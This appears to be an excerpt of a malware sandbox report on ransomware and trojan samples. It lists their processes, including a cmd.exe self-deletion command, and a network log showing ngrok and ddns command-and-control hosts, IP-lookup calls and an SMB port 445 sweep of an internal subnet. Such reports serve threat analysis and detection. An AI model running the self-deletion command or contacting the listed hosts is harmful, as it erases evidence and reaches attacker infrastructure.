"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-f716105c9ddf6f05dd9b202e6a0a2064e0ca9a1021407fb1feee6f83512cac9e.exe
HEUR-Trojan.MSIL.Crypt.gen-f716105c9ddf6f05dd9b202e6a0a2064e0ca9a1021407fb1feee6f83512cac9e.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe *32
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-ad45ac253fc9225f631605569d57ca7b0c27d53468a9a732963d0f3cf97e14e8.exe
"C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-ad45ac253fc9225f631605569d57ca7b0c27d53468a9a732963d0f3cf97e14e8.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-d6b9ef1899c1b113371f34db9d306763e20d9dc759fb9975982a53e6a11b1f5b.exe
"C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-d6b9ef1899c1b113371f34db9d306763e20d9dc759fb9975982a53e6a11b1f5b.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 8c881c2cfea9.ngrok.io | udp |
| DE | 3.124.142.205:80 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | 152.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| DE | 3.124.142.205:80 | 8c881c2cfea9.ngrok.io | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | telete.in | udp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 8.8.8.8:53 | 205.142.124.3.in-addr.arpa | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 227.243.59.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.tcp.ngrok.io | udp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| DE | 45.153.241.244:5506 | tcp | |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | icanhazip.com | udp |
| US | 104.16.184.241:80 | icanhazip.com | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 8.8.8.8:53 | 241.184.16.104.in-addr.arpa | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.48:445 | tcp | |
| N/A | 10.127.0.58:445 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.45:445 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.43:445 | tcp | |
| N/A | 10.127.0.49:445 | tcp | |
| N/A | 10.127.0.57:445 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.44:445 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.0:445 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.54:445 | tcp | |
| N/A | 10.127.0.37:445 | tcp | |
| N/A | 10.127.0.50:445 | tcp | |
| N/A | 10.127.0.51:445 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.61:445 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.62:445 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.60:445 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.52:445 | tcp | |
| DE | 45.153.241.244:5506 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.38:445 | tcp | |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.0.46:445 | tcp | |
| N/A | 10.127.0.42:445 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.47:445 | tcp | |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.56:445 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.55:445 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.59:445 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.53:445 | tcp | |
| N/A | 10.127.0.63:445 | tcp | |
| N/A | 10.127.0.64:445 | tcp | |
| N/A | 10.127.0.65:445 | tcp | |
| N/A | 10.127.0.41:445 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.73:445 | tcp | |
| N/A | 10.127.0.80:445 | tcp | |
| N/A | 10.127.0.129:445 | tcp | |
| N/A | 10.127.0.84:445 | tcp | |
| N/A | 10.127.0.120:445 | tcp | |
| N/A | 10.127.0.128:445 | tcp | |
| N/A | 10.127.0.103:445 | tcp | |
| N/A | 10.127.0.66:445 | tcp | |
| N/A | 10.127.0.69:445 | tcp | |
| N/A | 10.127.0.114:445 | tcp | |
| N/A | 10.127.0.92:445 | tcp | |
| N/A | 10.127.0.125:445 | tcp | |
| N/A | 10.127.0.126:445 | tcp | |
| N/A | 10.127.0.78:445 | tcp | |
| N/A | 10.127.0.122:445 | tcp | |
| N/A | 10.127.0.96:445 | tcp | |
| N/A | 10.127.0.102:445 | tcp | |
| N/A | 10.127.0.136:445 | tcp | |
| N/A | 10.127.0.110:445 | tcp | |
| N/A | 10.127.0.133:445 | tcp | |
| N/A | 10.127.0.81:445 | tcp | |
| N/A | 10.127.0.82:445 | tcp | |
| N/A | 10.127.0.93:445 | tcp | |
| N/A | 10.127.0.77:445 | tcp | |
| N/A | 10.127.0.99:445 | tcp | |
| N/A | 10.127.0.140:445 | tcp | |
| N/A | 10.127.0.86:445 | tcp | |
| N/A | 10.127.0.113:445 | tcp | |
| N/A | 10.127.0.119:445 | tcp | |
| N/A | 10.127.0.97:445 | tcp | |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| N/A | 10.127.0.75:445 | tcp | |
| N/A | 10.127.0.124:445 | tcp | |
| N/A | 10.127.0.87:445 | tcp | |
| N/A | 10.127.0.116:445 | tcp | |
| N/A | 10.127.0.135:445 | tcp | |
| N/A | 10.127.0.138:445 | tcp | |
| N/A | 10.127.0.79:445 | tcp | |
| N/A | 10.127.0.137:445 | tcp | |
| N/A | 10.127.0.117:445 | tcp | |
| N/A | 10.127.0.141:445 | tcp | |
| N/A | 10.127.0.90:445 | tcp | |
| N/A | 10.127.0.145:445 | tcp | |
| N/A | 10.127.0.76:445 | tcp | |
| N/A | 10.127.0.98:445 | tcp | |
| N/A | 10.127.0.104:445 | tcp | |
| N/A | 10.127.0.85:445 | tcp | |
| N/A | 10.127.0.108:445 | tcp | |
| N/A | 10.127.0.111:445 | tcp | |
| US | 8.8.8.8:53 | 69.209.201.84.in-addr.arpa | udp |
| N/A | 10.127.0.101:445 | tcp | |
| N/A | 10.127.0.131:445 | tcp | |
| N/A | 10.127.0.139:445 | tcp | |
| N/A | 10.127.0.127:445 | tcp | |
| N/A | 10.127.0.70:445 | tcp | |
| N/A | 10.127.0.72:445 | tcp | |
| N/A | 10.127.0.134:445 | tcp | |
| N/A | 10.127.0.143:445 | tcp | |
| N/A | 10.127.0.74:445 | tcp | |
| N/A | 10.127.0.105:445 | tcp | |
| N/A | 10.127.0.142:445 | tcp | |
| N/A | 10.127.0.83:445 | tcp | |
| N/A | 10.127.0.95:445 | tcp | |
| N/A | 10.127.0.100:445 | tcp | |
| N/A | 10.127.0.112:445 | tcp | |
| N/A | 10.127.0.109:445 | tcp | |
| N/A | 10.127.0.144:445 | tcp | |
| N/A | 10.127.0.130:445 | tcp | |
| N/A | 10.127.0.67:445 | tcp | |
| N/A | 10.127.0.123:445 | tcp | |
| N/A | 10.127.0.71:445 | tcp | |
| N/A | 10.127.0.107:445 | tcp | |
| N/A | 10.127.0.121:445 | tcp | |
| N/A | 10.127.0.89:445 | tcp | |
| N/A | 10.127.0.91:445 | tcp | |
| N/A | 10.127.0.94:445 | tcp | |
| N/A | 10.127.0.106:445 | tcp | |
| N/A | 10.127.0.118:445 | tcp | |
| N/A | 10.127.0.132:445 | tcp | |
| N/A | 10.127.0.68:445 | tcp | |
| N/A | 10.127.0.88:445 | tcp | |
| N/A | 10.127.0.115:445 | tcp | |
| N/A | 10.127.0.241:445 | tcp | |
| N/A | 10.127.0.178:445 | tcp | |
| N/A | 10.127.0.183:445 | tcp | |
| N/A | 10.127.0.153:445 | tcp | |
| N/A | 10.127.0.182:445 | tcp | |
| N/A | 10.127.0.171:445 | tcp | |
| N/A | 10.127.0.228:445 | tcp | |
| N/A | 10.127.0.151:445 | tcp | |
| N/A | 10.127.0.189:445 | tcp | |
| N/A | 10.127.0.220:445 | tcp | |
| N/A | 10.127.0.186:445 | tcp | |
| N/A | 10.127.0.207:445 | tcp | |
| N/A | 10.127.0.168:445 | tcp | |
| N/A | 10.127.0.169:445 | tcp | |
| N/A | 10.127.0.204:445 | tcp | |
| N/A | 10.127.0.205:445 | tcp | |
| N/A | 10.127.0.159:445 | tcp | |
| N/A | 10.127.0.162:445 | tcp | |
| N/A | 10.127.0.218:445 | tcp | |
| N/A | 10.127.0.213:445 | tcp | |
| N/A | 10.127.0.160:445 | tcp | |
| N/A | 10.127.0.190:445 | tcp | |
| N/A | 10.127.0.210:445 | tcp | |
| N/A | 10.127.0.240:445 | tcp | |
| N/A | 10.127.0.192:445 | tcp | |
| N/A | 10.127.0.179:445 | tcp | |
| N/A | 10.127.0.200:445 | tcp | |
| N/A | 10.127.0.152:445 | tcp | |
| N/A | 10.127.0.223:445 | tcp | |
| N/A | 10.127.0.161:445 | tcp | |
| N/A | 10.127.0.221:445 | tcp | |
| N/A | 10.127.0.157:445 | tcp | |
| N/A | 10.127.0.170:445 | tcp | |
| N/A | 10.127.0.155:445 | tcp | |
| N/A | 10.127.0.174:445 | tcp | |
| N/A | 10.127.0.203:445 | tcp | |
| N/A | 10.127.0.219:445 | tcp | |
| N/A | 10.127.0.249:445 | tcp | |
| N/A | 10.127.0.227:445 | tcp | |
| N/A | 10.127.0.149:445 | tcp | |
| N/A | 10.127.0.212:445 | tcp | |
| N/A | 10.127.0.211:445 | tcp | |
| N/A | 10.127.0.230:445 | tcp | |
| N/A | 10.127.0.147:445 | tcp | |
| N/A | 10.127.0.150:445 | tcp | |
| N/A | 10.127.0.180:445 | tcp | |
| N/A | 10.127.0.215:445 | tcp | |
| N/A | 10.127.0.173:445 | tcp | |
| N/A | 10.127.0.222:445 | tcp | |
| N/A | 10.127.0.202:445 | tcp | |
| N/A | 10.127.0.229:445 | tcp | |
| N/A | 10.127.0.146:445 | tcp | |
| N/A | 10.127.0.154:445 | tcp | |
| N/A | 10.127.0.181:445 | tcp | |
| N/A | 10.127.0.175:445 | tcp | |
| N/A | 10.127.0.226:445 | tcp | |
| N/A | 10.127.0.214:445 | tcp | |
| N/A | 10.127.0.248:445 | tcp | |
| N/A | 10.127.0.193:445 | tcp | |
| N/A | 10.127.0.206:445 | tcp | |
| N/A | 10.127.0.187:445 | tcp | |
| N/A | 10.127.0.231:445 | tcp | |
| N/A | 10.127.0.172:445 | tcp | |
| N/A | 10.127.0.188:445 | tcp | |
| N/A | 10.127.0.201:445 | tcp | |
| N/A | 10.127.0.148:445 | tcp | |
| N/A | 10.127.0.158:445 | tcp | |
| N/A | 10.127.0.191:445 | tcp | |
| N/A | 10.127.0.156:445 | tcp | |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| N/A | 10.127.0.254:445 | tcp | |
| N/A | 10.127.0.166:445 | tcp | |
| N/A | 10.127.0.176:445 | tcp | |
| N/A | 10.127.0.185:445 | tcp | |
| N/A | 10.127.0.209:445 | tcp | |
| N/A | 10.127.0.242:445 | tcp | |
| N/A | 10.127.0.197:445 | tcp | |
| N/A | 10.127.0.208:445 | tcp | |
| N/A | 10.127.0.217:445 | tcp | |
| N/A | 10.127.0.236:445 | tcp | |
| N/A | 10.127.0.237:445 | tcp | |
| N/A | 10.127.0.164:445 | tcp | |
| N/A | 10.127.0.234:445 | tcp | |
| N/A | 10.127.0.243:445 | tcp | |
| N/A | 10.127.0.245:445 | tcp | |
| N/A | 10.127.0.216:445 | tcp | |
| N/A | 10.127.0.244:445 | tcp | |
| N/A | 10.127.0.232:445 | tcp | |
| N/A | 10.127.0.250:445 | tcp | |
| N/A | 10.127.0.251:445 | tcp | |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| N/A | 10.127.0.184:445 | tcp | |
| N/A | 10.127.0.163:445 | tcp | |
| N/A | 10.127.0.238:445 | tcp | |
| N/A | 10.127.0.253:445 | tcp | |
| N/A | 10.127.0.198:445 | tcp | |
| N/A | 10.127.0.235:445 | tcp | |
| N/A | 10.127.0.247:445 | tcp | |
| N/A | 10.127.0.199:445 | tcp | |
| N/A | 10.127.0.225:445 | tcp | |
| N/A | 10.127.0.165:445 | tcp | |
| N/A | 10.127.0.196:445 | tcp | |
| N/A | 10.127.0.246:445 | tcp | |
| N/A | 10.127.0.252:445 | tcp | |
| N/A | 10.127.0.195:445 | tcp | |
| N/A | 10.127.0.194:445 | tcp | |
| N/A | 10.127.0.177:445 | tcp | |
| N/A | 10.127.0.224:445 | tcp | |
| N/A | 10.127.0.239:445 | tcp | |
| N/A | 10.127.0.233:445 | tcp | |
| N/A | 10.127.0.167:445 | tcp | |
| US | 199.59.243.227:443 | telete.in | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | motiwa.xyz | udp |
| US | 199.59.243.227:443 | telete.in | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 104.26.4.15:443 | db-ip.com | tcp |
| US | 8.8.8.8:53 | 15.4.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | api.db-ip.com | udp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 104.26.4.15:443 | api.db-ip.com | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| DE | 45.153.241.244:5506 | tcp | |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 8.8.8.8:53 | bobrat1111.ddns.net | udp |
| US | 8.8.8.8:53 | www.maxmind.com | udp |
| US | 104.17.27.25:80 | www.maxmind.com | tcp |
| US | 8.8.8.8:53 | videoconvert-download38.xyz | udp |
| US | 107.178.223.183:443 | videoconvert-download38.xyz | tcp |
| US | 8.8.8.8:53 | 25.27.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | sergeevih43.tumblr.com | udp |
| US | 104.21.65.24:443 | api.2ip.ua | tcp |
| US | 74.114.154.18:443 | sergeevih43.tumblr.com | tcp |
| US | 8.8.8.8:53 | 24.65.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| SG | 2.56.59.245:80 | tcp | |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| GB | 163.70.147.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | 18.154.114.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.147.70.163.in-addr.arpa | udp |
| GB | 142.250.187.195:80 | c.pki.goog | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | grene231.ddns.net | udp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.223.178.107.in-addr.arpa | udp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | email.yg9.me | udp |
| US | 8.8.8.8:53 | email.yg9.me | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| RU | 176.111.174.254:56328 | tcp | |
| US | 8.8.8.8:53 | 0.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.0.127.10.in-addr.arpa | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | 101.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | grene231.ddns.net | udp |
| US | 8.8.8.8:53 | 68.0.127.10.in-addr.arpa | udp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 78.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.0.127.10.in-addr.arpa | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | 16.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.0.127.10.in-addr.arpa | udp |
